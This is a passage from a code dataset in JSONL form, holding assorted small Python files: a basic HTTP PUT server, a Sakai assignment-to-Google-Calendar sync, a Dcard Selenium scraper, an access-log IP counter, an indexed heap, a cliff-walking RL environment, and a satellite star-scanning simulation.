\n return psi\n","sub_path":"explicitScheme/streamFunctionEnt/map1Dto2D.py","file_name":"map1Dto2D.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"432543890","text":"import http.server as ht\nfrom cgi import parse_header\n\n\nclass RequestHandler(ht.SimpleHTTPRequestHandler):\n\n def do_PUT(self):\n len = int(self.headers[\"Content-Length\"])\n number= str(self.rfile.read(len), 'utf-8')\n with open(\"save.txt\",\"w\") as file:\n file.write(number)\n self.send_response(200)\n self.end_headers()\n\n \nif __name__ == \"__main__\":\n s = ht.HTTPServer((\"\",8080), RequestHandler)\n s.serve_forever()\n\n\n\n\n\n\n\n\n","sub_path":"_Scrap/Server_Basic/srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"589827632","text":"\n# author: jason giroux\n# purpose:\n# use google API and SAKAI REST API to take assignments in bridges for rwu and transfer them to google calendar\n# since some professors do not use the calendar this will combine the assignments section with the calendar section\n\n# defining imports needed for this project\n\n# todo:\n# check for assignemnts and cal assignemts that have a changed date or changed time, cancel the originally scheduled event and reschedule with new time/date\n# worst case scenario, time is at 10.719 seconds for initial run to add all assignments. need to cut down to 5 seconds.\n\nfrom SakaiPy import SakaiPy\nimport json\nimport dateDict\nimport combineJson\nfrom google_int import integration\nimport threading\nimport time\nimport colorify\n\nclass main():\n def __init__(self, classes):\n #credentials file for login\n self.text = \"creds.json\"\n\n # raw load for class info before parsing\n self.info = \"\"\n\n # calendar\n self.sak = \"\"\n self.calendar = \"\"\n self.calDict = \"\"\n self.calStrJson = \"\"\n self.calPartJson = \"\"\n self.cal = \"\"\n\n # assignments\n self.assign = \"\"\n self.assignDict = \"\"\n self.assignStrJson = \"\"\n self.assignPartJson = \"\"\n self.assignJson = \"\"\n self.assignCal = \"\"\n\n self.classes = classes\n self.fetchedClasses = []\n self.contents = \"\"\n\n \"\"\"\n get calendar from sakai and output to a json file and return a json object\n exclude classes you are not enrolled in, and assignments that have already passed\n \"\"\"\n def getCal(self):\n self.sak = SakaiPy.SakaiPy(self.info)\n self.calendar = self.sak.get_calendar()\n self.calDict = self.calendar.getAllMyEvents()\n self.calStrJson = json.dumps(self.calDict, ensure_ascii=False)\n self.calPartJson = json.loads(self.calStrJson)\n\n self.calJson = self.calPartJson[\"calendar_collection\"]\n assDict = {}\n\n # a is the counter\n # b is the json object\n\n # loop through and add to json file if it matches the classes you define above\n counter = 0\n for a, b in enumerate(self.calJson):\n # appending to self.fetchedclasses if any class are new\n if a == 0 or not self.fetchedClasses[counter-1] == b[\"siteName\"]:\n self.fetchedClasses.append(b[\"siteName\"])\n counter = counter + 1\n\n # since Sakai returns classes you have taken in last semester you will need to define the classses you\n # are currently enrolled in.\n for i in range(len(self.classes)):\n temp = b[\"firstTime\"]\n # determines if it matches your classes and if the assignment is late.\n if b[\"siteName\"] == self.classes[i] and not dateDict.isLate(temp[\"display\"],b[\"assignmentId\"]):\n info = {\n \"assignmentId\": b[\"assignmentId\"],\n \"entityTitle\": b[\"entityTitle\"],\n \"siteName\": b[\"siteName\"],\n \"due\": dateDict.dateFormat(temp[\"display\"]),\n \"dueTime\": dateDict.combineTime(temp[\"display\"]),\n \"instructions\": b[\"description\"],\n \"title\": b[\"title\"],\n \"type\": b[\"type\"]\n }\n assDict[b['assignmentId']] = info\n else:\n continue\n self.cal = assDict\n # self.returnClassList()\n\n \"\"\"\n fetches the assignments from sakai and stores them in self.contents\n \"\"\"\n def getAssign(self):\n self.sak = SakaiPy.SakaiPy(self.info)\n self.assign = self.sak.get_assignment()\n self.assignDict = self.assign.getAllMyAssignments()\n self.assignDict = self.assignDict[\"assignment_collection\"]\n assignDict = {}\n for a, b in enumerate(self.assignDict):\n try:\n if self.cal[b[\"id\"]]:\n continue\n\n except KeyError as err:\n # if it is not late add to json\n if not dateDict.assignIsLate(b[\"dueTimeString\"], b[\"id\"]):\n due, time = dateDict.returnDateAndTimeAssign(b[\"dueTimeString\"])\n assignInfo = {\n \"assignmentId\": b[\"id\"],\n \"entityTitle\": b[\"entityTitle\"],\n \"instructions\": b[\"instructions\"],\n \"gradebookItemName\": b[\"gradebookItemName\"],\n \"due\": due,\n \"dueTime\": time,\n \"title\": b[\"title\"],\n \"type\": b[\"status\"]\n }\n assignDict[b['id']] = assignInfo\n else:\n continue\n\n self.contents = assignDict\n\n \"\"\"\n calendar returns classes that you are not enrolled in. this method will look through the returns object \n from the calendar and create a list of all the classes it pulled\n retuned list from cal = self.cal\n \"\"\"\n def returnClassList(self):\n # a = counter, b = object\n for a, b in enumerate(self.calJson):\n print(\"printing b\")\n print(b)\n temp = self.calJson[b]\n self.fetchedClasses.append(temp[\"siteName\"])\n\n print(\"Fetched classes from Calendar: \", self.fetchedClasses)\n\n # load the JSON file into self.info\n # this is a getter method for the creds file.\n def permissive_json_loads(self):\n with open(self.text) as cred:\n self.info = json.load(cred)\n\n\n# define the name of your classes to be scanned through and given a JSON file\nclasses = [\"COMSC.492.01-20/SP Integ Senior Design II\", \"COMSC.410.01-20/SP Artificial Intelligence\", \"COMSC.440.01-20/SP LangTranslation/Compiler Dsgn\", \"PHYS.330.01-20/SP Intro Phys Oceanography\" ]\n\nstart_time = time.time()\n\njason = main(classes)\njason.permissive_json_loads()\n\nt1 = threading.Thread(target=jason.getCal())\nt2 = threading.Thread(target=jason.getAssign())\n\nt1.start()\nt2.start()\nt1.join()\nt2.join()\n\nportal = combineJson.start(jason.contents, jason.cal)\ninter = integration(portal)\n\nintegration.creds(inter)\nintegration.Getcalendar(inter)\nintegration.checkDuplicates(inter)\n\nend_time = time.time()\ntime_lapsed = end_time - start_time\nm = \"Classes detected: \" + str(jason.fetchedClasses)\ncolorify.prGreen(m)\nm = \"TIME LAPSED: \"+str(time_lapsed)+\" s\"\ncolorify.prRed(m)\n","sub_path":"electron_app/PyEngine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"443940284","text":"import quantum_test as qnn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt(\"sine.txt\")\ninp = data[:, 0]\nout = data[:, 1]\n\nqnn1 = qnn.qnn()\nqnn1[\"init\"](5)\nweights = qnn1[\"train\"](inp, out, 2)\nx_pred = np.linspace(-1, 1, 50)\npredictions = qnn1[\"test\"](x_pred, weights)\n\nqnn2 = qnn.qnn()\nqnn2[\"set_var\"](qnn1[\"get_var\"]())\nweights = qnn2[\"train\"](inp, out, 2)\npredictions2 = qnn2[\"test\"](x_pred, weights)\n\nplt.figure()\nplt.scatter(inp, out)\nplt.scatter(x_pred, predictions, color=\"green\")\nplt.scatter(x_pred, predictions2, color=\"red\")\nplt.xlabel(\"x\")\nplt.ylabel(\"f(x)\")\nplt.tick_params(axis=\"both\", which=\"major\")\nplt.tick_params(axis=\"both\", which=\"minor\")\nplt.show()\n","sub_path":"quantumudql/practice/first_try/attempting_something_new.py","file_name":"attempting_something_new.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"418087915","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\n\nimport sys\n\nif sys.version_info >= (3, 0):\n import fpdf_py3k as fpdf\n package_dir = 'fpdf_py3k'\nelse:\n import fpdf\n package_dir = 'fpdf'\n \nsetup(name='fpdf',\n version=fpdf.__version__,\n description='Simple PDF generation for Python',\n author='Olivier PLATHEY ported by Max',\n author_email='maxpat78@yahoo.it',\n maintainer = \"Mariano Reingart\",\n maintainer_email = \"reingart@gmail.com\",\n url='http://code.google.com/p/pyfpdf',\n download_url=\"http://pyfpdf.googlecode.com/files/pyfpdf-%s.tar.gz\" % fpdf.__version__,\n packages=['fpdf', ],\n package_dir={'fpdf': package_dir},\n package_data={'fpdf': ['font/*.ttf', 'font/*.txt']},\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.5\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.2\",\n \"Operating System :: OS Independent\",\n \"Topic :: Software Development :: Libraries :: PHP Classes\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: Multimedia :: Graphics\",\n ],\n keywords=\"pdf unicode png jpg\",\n )\n\n","sub_path":"fpdf-1.7.hg/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"638813636","text":"# 目標:用selenium打開Dcard網址, 搜尋關鍵字並印出所有標題\r\n\r\n# ChromeDriver下載網址\r\n# https://sites.google.com/a/chromium.org/chromedriver/downloads\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n# Explicit Waits功能\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\nimport time\r\n\r\n# 本範例預設將ChromeDriver存至個人桌面, 可自行調整路徑\r\nPATH = \"C:/Users/user/Desktop/chromedriver.exe\"\r\ndriver = webdriver.Chrome(PATH)\r\n\r\ndriver.get(\"https://www.dcard.tw/f\")\r\nsearch = driver.find_element_by_name(\"query\")\r\nsearch.clear() # 清除欄位, 避免網頁帶有預設值\r\nsearch.send_keys(\"工作\")\r\nsearch.send_keys(Keys.RETURN)\r\n\r\n# 等待driver最多20秒, 直到class_name出現sc-3yr054-1\r\nWebDriverWait(driver, 20).until(\r\n EC.presence_of_element_located((By.CLASS_NAME, \"sc-3yr054-1\"))\r\n)\r\n\r\n# 找出每個class_name, 用迴圈印出\r\ntitles = driver.find_elements_by_class_name(\"tgn9uw-3\")\r\nfor title in titles:\r\n print(title.text)\r\n\r\nlink = driver.find_element_by_link_text(\"跟對方延後報到結果...怎麼辦\")\r\nlink.click() # 點擊\r\ndriver.back() # 回上一頁\r\ndriver.forward() # 回下一頁\r\n\r\ntime.sleep(3)\r\ndriver.quit()\r\n","sub_path":"CrawlerPractice/Dcard_selenium.py","file_name":"Dcard_selenium.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306800018","text":"# 3. Suppose we have an access.log web server.\n# Write a function that receives file name and returns ten IP addresses from which there were most requests\n# Lib https://pypi.org/project/IPy/ could help u working with IPs\n# Write a tests using unittest/pytest.\n\nimport pandas as pd\nfrom IPy import IP\n\nlogfile = 'access.log'\n\n\nclass TopTen:\n def __init__(self):\n self.filename = ''\n self.res = []\n\n def getlist(self):\n return self.res\n\n def setfilename(self, lfile):\n print(\"--\", self.filename)\n self.filename = lfile\n print(self.filename)\n\n def top_ten_ip(self):\n print(self.filename)\n data = pd.read_csv('access.log', sep=\" \", header=None)\n self.res = data[0].value_counts()\n self.res = self.res.reset_index(inplace=False)\n self.res = self.res['index'][:10].to_list()\n for ip in self.res:\n print(IP(ip).strNormal())\n\n\ndef main():\n topten = TopTen()\n topten.setfilename(logfile)\n topten.top_ten_ip()\n print(topten.getlist())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"TopTen.py","file_name":"TopTen.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"20081191","text":"from Array import Array\nfrom random import randint\n\n\nclass IndexHeap:\n def __init__(self, capacity):\n # data 表示为元素的数组\n self._data = Array(capacity=capacity)\n # index[i] 数组表示为对堆中第i的位置上的元素\n self._index = Array(capacity=capacity)\n # reversed[i] 为i的在索引堆位置是index逆运算\n self._reversed = Array(capacity=capacity)\n for i in range(capacity):\n self._reversed.add(i, -1)\n self.capacity = capacity\n self.count = 0\n\n def getSize(self):\n return self.count\n\n def getCapacity(self):\n return self.capacity\n\n def isEmpty(self):\n return self.count == 0\n\n def add(self, i, ele):\n self._data.add(i, ele)\n\n self._index.add_last(i)\n self._reversed.set(i, self.count)\n self.count += 1\n self._shiftUp(self._data.get_size() - 1)\n\n def extractMax(self):\n if self.count < 0:\n raise ValueError(\"capacity should be >0\")\n ele = self._data.get(self._index.get_first())\n self._index.set(0, self._index.get_last())\n self.count -= 1\n if self.count != 0:\n self._index.remove_last()\n self._shiftDown(0)\n return ele\n\n def leftChid(self, index):\n return 2 * index + 1\n\n def rightChild(self, index):\n return 2 * index + 2\n\n def _shiftDown(self, index):\n if index < 0:\n raise ValueError(\"index should be postive\")\n cur = self._data.get(self._index.get(index))\n cur_index = self._index.get(index)\n while self.leftChid(index) < self._index.get_size():\n max_index = self.leftChid(index)\n if self.rightChild(index) < self._index.get_size() and self._data.get(\n self._index.get(self.rightChild(index))) > self._data.get(self._index.get(self.leftChid(index))):\n max_index = self.rightChild(index)\n if self._data.get(self._index.get(max_index)) > cur:\n self._index.set(index, self._index.get(max_index))\n self._reversed.set(self._index.get(max_index), index)\n index = max_index\n else:\n break\n self._index.set(index, cur_index)\n self._reversed.set(self._index.get(index), cur_index)\n\n def _shiftUp(self, index):\n if index < 0:\n raise ValueError(\"index should be postive\")\n cur = self._data.get(self._index.get(index))\n cur_index = self._index.get(index)\n while (index - 1) // 2 >= 0:\n parent = (index - 1) // 2\n if self._data.get(self._index.get(parent)) < cur:\n self._index.set(index, self._index.get(parent))\n self._reversed.set(self._index.get(index), index)\n index = (index - 1) // 2\n else:\n break\n self._index.set(index, cur_index)\n self._reversed.set(self._index.get(index), index)\n\n def extractMaxIndex(self):\n if self.count < 0:\n raise ValueError(\"capacity should be >0\")\n ele = self._index.get_size()\n self._index.set(0, self._index.get_last())\n self._reversed.set(self._index.get(0), 0)\n self._reversed.set(self._index.get_last(), -1)\n self.count -= 1\n\n if self.count != 0:\n self._index.remove_last()\n self._shiftDown(0)\n return ele\n\n def contains(self, index):\n return self._reversed.get(index) != -1\n\n def getItem(self, index):\n assert self.contains(index)\n return self._data.get(index)\n\n def change(self, i, item):\n assert self.contains(i)\n self._data.set(i, item)\n # 找到index中的i的位置 index[j] == i\n # 之后shiftUp(j),shiftDown(j)\n # o(n)\n # for j, w in enumerate(self._index):\n # if w == i:\n # self._shiftDown(j)\n # self._shiftUp(j)\n # return\n j = self._reversed.get(i)\n self._shiftUp(j)\n self._shiftDown(j)\n\n def __str__(self):\n return str(\n ' heap_index: {}, heap_value:{},capacity: {},size:{}'.format(self._data, self._index, self.capacity,\n self.count))\n\n\nif __name__ == \"__main__\":\n # indexHeap = IndexHeap(100000)\n # random_list = [randint(-1000, 1000) for _ in range(10000)]\n # for index, i in enumerate(random_list):\n # indexHeap.add(index, i)\n #\n # # print(indexHeap.getItem(9))\n #\n # for _ in range(len(random_list)):\n # print(indexHeap.extractMax())\n # # print(indexHeap)\n\n indexHeap = IndexHeap(5)\n alist = [1, 2, 4, 5, 6]\n for index, i in enumerate(alist):\n indexHeap.add(index, i)\n\n indexHeap.change(1,10)\n\n for _ in range(len(alist)):\n print(indexHeap.extractMax())\n","sub_path":"Chapter10_MaxHeap/IndexHeap.py","file_name":"IndexHeap.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"211510474","text":"# #### BEGIN LICENSE BLOCK #####\n# Version: MPL 1.1/GPL 2.0/LGPL 2.1\n#\n# The contents of this file are subject to the Mozilla Public License Version\n# 1.1 (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n# http://www.mozilla.org/MPL/\n#\n# Software distributed under the License is distributed on an \"AS IS\" basis,\n# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\n# for the specific language governing rights and limitations under the\n# License.\n#\n#\n# Contributor(s):\n#\n# Bin.Li (ornot2008@yahoo.com)\n#\n#\n# Alternatively, the contents of this file may be used under the terms of\n# either the GNU General Public License Version 2 or later (the \"GPL\"), or\n# the GNU Lesser General Public License Version 2.1 or later (the \"LGPL\"),\n# in which case the provisions of the GPL or the LGPL are applicable instead\n# of those above. If you wish to allow use of your version of this file only\n# under the terms of either the GPL or the LGPL, and not to allow others to\n# use your version of this file under the terms of the MPL, indicate your\n# decision by deleting the provisions above and replace them with the notice\n# and other provisions required by the GPL or the LGPL. If you do not delete\n# the provisions above, a recipient may use your version of this file under\n# the terms of any one of the MPL, the GPL or the LGPL.\n#\n# #### END LICENSE BLOCK #####\n#\n# /\n\n\nimport sys\n\nimport numpy as np\n\nfrom env.base_discrete_env import PureDiscreteEnv\n\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\n\n\nclass CliffWalkingEnv(PureDiscreteEnv):\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n def _limit_coordinates(self, coord):\n coord[0] = min(coord[0], self.shape[0] - 1)\n coord[0] = max(coord[0], 0)\n coord[1] = min(coord[1], self.shape[1] - 1)\n coord[1] = max(coord[1], 0)\n return coord\n\n def _calculate_transition_prob(self, current, delta):\n new_position = np.array(current) + np.array(delta)\n new_position = self._limit_coordinates(new_position).astype(int)\n new_state = np.ravel_multi_index(tuple(new_position), self.shape)\n reward = -100.0 if self._cliff[tuple(new_position)] else -1.0\n is_done = self._cliff[tuple(new_position)] or (\n tuple(new_position) == (3, 11))\n return [(1.0, new_state, reward, is_done)]\n\n def __init__(self):\n self.shape = (4, 12)\n\n nS = np.prod(self.shape)\n nA = 4\n\n # Cliff Location\n self._cliff = np.zeros(self.shape, dtype=np.bool)\n self._cliff[3, 1:-1] = True\n\n # Calculate transition probabilities\n P = {}\n for s in range(nS):\n position = np.unravel_index(s, self.shape)\n P[s] = {a: [] for a in range(nA)}\n P[s][UP] = self._calculate_transition_prob(position, [-1, 0])\n P[s][RIGHT] = self._calculate_transition_prob(position, [0, 1])\n P[s][DOWN] = self._calculate_transition_prob(position, [1, 0])\n P[s][LEFT] = self._calculate_transition_prob(position, [0, -1])\n\n # We always start in state (3, 0)\n isd = np.zeros(nS)\n isd[np.ravel_multi_index((3, 0), self.shape)] = 1.0\n\n super(CliffWalkingEnv, self).__init__(nS, nA, P, isd)\n\n def render(self, mode='human', close=False):\n if close:\n return\n\n outfile = sys.stdout\n\n for s in range(self.nS):\n position = np.unravel_index(s, self.shape)\n # print(self.s)\n if self.s == s:\n output = \" x \"\n elif position == (3, 11):\n output = \" T \"\n elif self._cliff[position]:\n output = \" C \"\n else:\n output = \" o \"\n\n if position[1] == 0:\n output = output.lstrip()\n if position[1] == self.shape[1] - 1:\n output = output.rstrip()\n output += \"\\n\"\n\n outfile.write(output)\n outfile.write(\"\\n\")\n\n def reset(self, randomly=True):\n if randomly:\n return super().reset(True)\n\n # hard coded , the index is (3,0)\n return np.ravel_multi_index((3, 0), self.shape)\n","sub_path":"work/env/cliff_walking.py","file_name":"cliff_walking.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"189317592","text":"import datetime\nfrom datetime import date\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n#Read the data file\nytsubs_df = pd.read_csv('Totals.csv')\nprint(ytsubs_df.shape)\n\nytsubs_df.iloc[0,1] = 12\n\nytsubs_df['TotalSubscribers'] = ytsubs_df['Subscribers'].cumsum()\n\ndef forecast_with_Rwf(df,col,h):\n \"\"\"Calculate and return the forecasts using Naive with Drift method also called random walk forecast method\n Return: forecast - list containing the point forecasts\n Input: df - dataframe containing the time series columns\n col - Name of the column in the dataframe containing the time series\n h - Time period for which to forecast\n \"\"\"\n y_1 , y_T = df[col].iloc[1] , df[col].iloc[-1]\n T = df[col].shape[0]\n forecast = []\n for h in range(1,31):\n val = y_T + (h*(y_T-y_1)/(T-1))\n forecast.append(int(val))\n return forecast\n\n\ndef generate_date_range(start_date,numdays=30,fmt='%Y-%m-%d',direction='forward'):\n \"\"\"Generate the date range from given start date for the number days in the given direction\n Input: start_date - starting date from which to create the date range format expected YYYY-MM-DD\n numdays - Number of days for which the date range needs to be generated for\n fmt - date format to be returned\n direction - forward or backward direction\n \"\"\"\n base = datetime.datetime.strptime(start_date,'%Y-%m-%d') \n if direction=='forward':\n date_list = [(base + datetime.timedelta(days=x)).strftime(fmt) for x in range(numdays)]\n elif direction=='backward':#reverese date range\n date_list = [(base - datetime.timedelta(days=x)).strftime(fmt) for x in range(numdays)]\n else:\n print('direction value should be either \"forward\" or \"backward\"')\n return None\n return date_list\n\nfcast_rwf = forecast_with_Rwf(ytsubs_df,'TotalSubscribers',30)\n\nfcast_rwf_df = pd.DataFrame({'Date':generate_date_range('2021-01-02'), 'TotalSubscribers':fcast_rwf})\n\nprint(fcast_rwf_df)\nprint(fcast_rwf[-1])\nplt.plot(ytsubs_df['TotalSubscribers'])\nplt.show()","sub_path":"YoutubSubsForecast.py","file_name":"YoutubSubsForecast.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"560074440","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 18 14:59:19 2018\n\n@author: vallevaro\n\"\"\"\n\nfrom quaternion import*\nfrom sympy import*\nfrom sympy import Line3D, Point3D\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\nclass Observation: \n '''\n Creates and object equivalent to an observation. \n\n Horizontal Celestial Coordinates: self.coor = (azimuth, altitude)\n \n Calculates equivalence to Cartesian Coordinates: self.vector = (x, y, z)\n '''\n def __init__(self, azimuth, altitude):\n self.azimuth = azimuth\n self.altitude = altitude\n self.coor = np.array([self.azimuth, self.altitude])\n \n self.x = np.cos(self.azimuth)*np.cos(self.altitude)\n self.y = np.sin(self.azimuth)*np.cos(self.altitude)\n self.z = np.sin(self.altitude)\n \n self.observations = [] \n self.measurements = [] \n self.times = [] \n self.indexes = []\n \n self.vector = unit_vector(np.array([self.x,self.y,self.z])) \n \nclass Sky: \n '''\n Creates a sky in the unit sphere, in the BCRS frame.\n List of elements: sky.elements\n '''\n def __init__(self, n):\n self.elements = []\n \n for n in range(n):\n azimuth = np.random.uniform(0, (2*np.pi))\n altitude = np.random.uniform(-np.pi/2., np.pi/2)\n obs = Observation(azimuth, altitude)\n self.elements.append(obs) \n \nclass Satellite: \n '''\n Satellite object is resumed to be a plane.\n A plane is determined completely by a Point and a Vector.\n \n __init__: define the satellite by given a point and a vector - default: point at (0,0,0)\n \n satellite.Rotate(_): introduce in _ a quaternion (from Quaternion class) to rotate the plane (aka satellite)\n \n satellite.Scan(_): introduce in _ sky to be scanned. \n satellite.observations = objects with coordinates in the SRS frame.\n satellite.measurements = objects with coordinates in the BCRS frame.\n satellite.times = angle at which a star interception occurs.\n satellite.indexes = the index of the observations made wrt the sky catalogue. \n Scan():\n \n Azimuth angle (Phi):indicates the radians swept by the scanner in the satellite plane. \n This scanner checks stars by increasing a 'deltaphi' radians in the satellite plane.\n Altitude angle (zeta):the altitude width angle of the scanner (width of vertical field of view wrt satellite plane)\n\n '''\n def __init__(self,z1,z2,z3, origin = Point3D(0,0,0)): \n self.zaxis = unit_vector(np.array([z1,z2,z3])) \n self.xyplane = Plane(origin, vector_to_point(self.zaxis))\n self.attitude = Quaternion(1.,0.,0.,0.).unit()\n\n \n def Rotate(self, newrotation): \n self.attitude = newrotation.unit() * self.attitude \n self.attitude.basis()\n \n self.zaxis = unit_vector(np.dot(self.attitude.A, self.zaxis)) \n self.xyplane = Plane((0.,0.,0.), vector_to_point(self.zaxis))\n \n def ViewLine(self, phi, zeta):\n self.phi = phi\n self.zeta = zeta \n\n def Scan(self, sky, zeta = np.radians(5.), phi= math.radians(360.), deltaphi = math.radians(1.)): \n\n '''\n Calculates in the BCRS the angle between the plane of the satellite and the line from the centre of the satellite to the star.\n This angle is - zeta_angle_star_plane.\n '''\n self.observations = [] \n self.measurements = [] \n self.times = [] \n self.indexes = []\n \n for idx, star in enumerate(sky.elements): \n star_point = vector_to_point(star.vector) \n star_line = Line3D(self.xyplane.args[0], star_point) \n arc_angle_star_xyplane = self.xyplane.angle_between(star_line) \n if len(arc_angle_star_xyplane.args) == 2:\n zeta_angle_star_plane = -float(arc_angle_star_xyplane.args[1])\n if len(arc_angle_star_xyplane.args) == 1:\n zeta_angle_star_plane = float(arc_angle_star_xyplane.args[0])\n \n\n if -zeta/2. < (zeta_angle_star_plane) < zeta/2.: \n self.indexes.append(idx)\n \n proy_star_point = self.xyplane.projection(star_point) \n proy_star_vector = point_to_vector(proy_star_point) \n proy_star_vector_srs = SRS(self, proy_star_vector) \n \n phi_angle_obs = np.arctan2(float(proy_star_vector_srs[1]), float(proy_star_vector_srs[0]))\n zeta_angle = np.arctan2(float(proy_star_vector_srs[2]), float(np.sqrt((proy_star_vector_srs[0])**2+(proy_star_vector_srs[0])**2)))\n \n if phi_angle_obs < 0.:\n phi_angle_obs = phi_angle_obs + 2*np.pi\n observation = Observation(phi_angle_obs, zeta_angle)\n self.observations.append(observation)\n \n '''\n Once observations are made, now we pass the scan to see at what times if the star in the detector's range\n '''\n #maybe change this to +- deltaphiphi/2 at some point? but careful that phi > 0\n for i in np.arange(0, phi, deltaphi):\n self.ViewLine(i, 0)\n axis1phi = self.phi%(2*np.pi) \n axis2phi = (self.phi + deltaphi)%(2*np.pi)\n \n for observation in self.observations:\n if axis1phi < observation.azimuth and observation.azimuth < axis2phi:\n time = i%(np.pi*2)\n self.times.append(time) \n \n \n################################## FUNCTIONS ##################################\n\ndef vector(x,y,z): \n return np.array([x,y,z])\n\ndef unit_vector(vector): \n return vector / np.linalg.norm(vector) \n \ndef vector_to_point(vector):\n return Point3D(vector[0], vector[1], vector[2])\n \ndef point_to_vector(point):\n #return np.array([point[0], point[1], point[2]]) \n return np.array([point.x, point.y, point.z]) \n\ndef vector_to_quaternion(vector):\n return Quaternion(0, float(vector[0]), float(vector[1]), float(vector[2])) #added float arguments to prevent Point3D fractions from being passed to the quaternion class.\n \ndef rotation_quaternion(vector, angle): \n ''' \n Calculates Quaternion equivalent to a rotation given by a vector and a angle in radians.\n '''\n vector = unit_vector(vector) \n t = np.cos(angle/2.)\n x = np.sin(angle/2.)*vector[0]\n y = np.sin(angle/2.)*vector[1]\n z = np.sin(angle/2.)*vector[2]\n \n qvector = Quaternion(t,x,y,z)\n return qvector\n\n \ndef SRS(satellite, vector):\n '''\n Changes coordinates of a vector in BCRS to SRS frame.\n '''\n q_vector_bcrs= vector_to_quaternion(vector)\n q_vector_srs = satellite.attitude * q_vector_bcrs * satellite.attitude.conjugate() #AL- Swapped to put conjugate on RHS of vector\n return np.array([q_vector_srs.x, q_vector_srs.y, q_vector_srs.z]) \n \ndef BCRS(satellite, vector):\n '''\n Changes coordinates of a vector in SRS to BCRS frame.\n '''\n q_vector_srs= vector_to_quaternion(vector)\n #q_vector_bcrs = satellite.attitude * q_vector_srs * satellite.attitude.conjugate()\n q_vector_bcrs = satellite.attitude.conjugate() * q_vector_srs * satellite.attitude #AL- Swapped to put conjugate on LHS of vector\n \n return np.array([q_vector_bcrs.x, q_vector_bcrs.y, q_vector_bcrs.z])\n \ndef Measurements(satellite): \n '''\n Takes all observation objects of the satellite (which are in the SRS frame) and converts them into the BCRS frame, making them observation-objects.\n self.measurements are objects with bcrs coordinates.\n '''\n satellite.measurements =[] \n for obs in satellite.observations: \n star_vector = BCRS(satellite, obs.vector)\n alpha = np.arctan2(star_vector[1], star_vector[0])\n delta = np.arctan2(star_vector[2], np.sqrt(star_vector[0]**2 + star_vector[1]**2))\n if alpha < 0 :\n alpha = alpha + 2*np.pi\n star = Observation(alpha, delta)\n satellite.measurements.append(star) \n \ndef Psi(satellite, sky):\n '''\n Calculates the difference between the coordinates of a star versus its correspondient coordinates (bcrs-framed) from Gaia.\n '''\n bcrs_stars_vector = [BCRS(satellite, obs.vector) for obs in satellite.observations]\n list_true_star_vector = [sky.elements[idx].vector for idx in satellite.indexes]\n diff = np.subtract(bcrs_stars_vector, list_true_star_vector)\n return diff\n\n \ndef Plot(satellite, sky): \n '''\n Plot: measurements (coordinates of stars measured by gaia and transformed into BCRS frame) vs true coordinates of the detected stars. \n '''\n Measurements(satellite)\n azimuth_obs = [star.coor[0] for star in satellite.measurements]\n altitude_obs = [star.coor[1] for star in satellite.measurements]\n \n azimuth_star = [sky.elements[idx].coor[0] for idx in satellite.indexes]\n altitude_star = [sky.elements[idx].coor[1] for idx in satellite.indexes]\n \n plt.figure() \n plt.grid()\n plt.ylabel('Altitude (rad)')\n plt.xlabel('Azimuth (rad)')\n plt.title('Measurements vs True Stars')\n \n red_dot, = plt.plot(azimuth_obs, altitude_obs, 'r*')\n blue_dot, = plt.plot(azimuth_star, altitude_star, 'bo')\n\n plt.legend([red_dot, (red_dot, blue_dot)], [\"Obs\", \"True Star\"])\n plt.show()\n \n\n \n \n\n \n \n \n \n \n \n \n","sub_path":"packages/scan/scanner_static.py","file_name":"scanner_static.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"580802469","text":"# UPLOAD_DIR = 'F:\\\\'\n# UPLOAD_FILENAMES = ['file1', 'file2']\nUPLOAD_DIR = '/home/sse/Desktop/data/'\nUPLOAD_FILENAMES = [\n '118Drug and Target.txt',\n 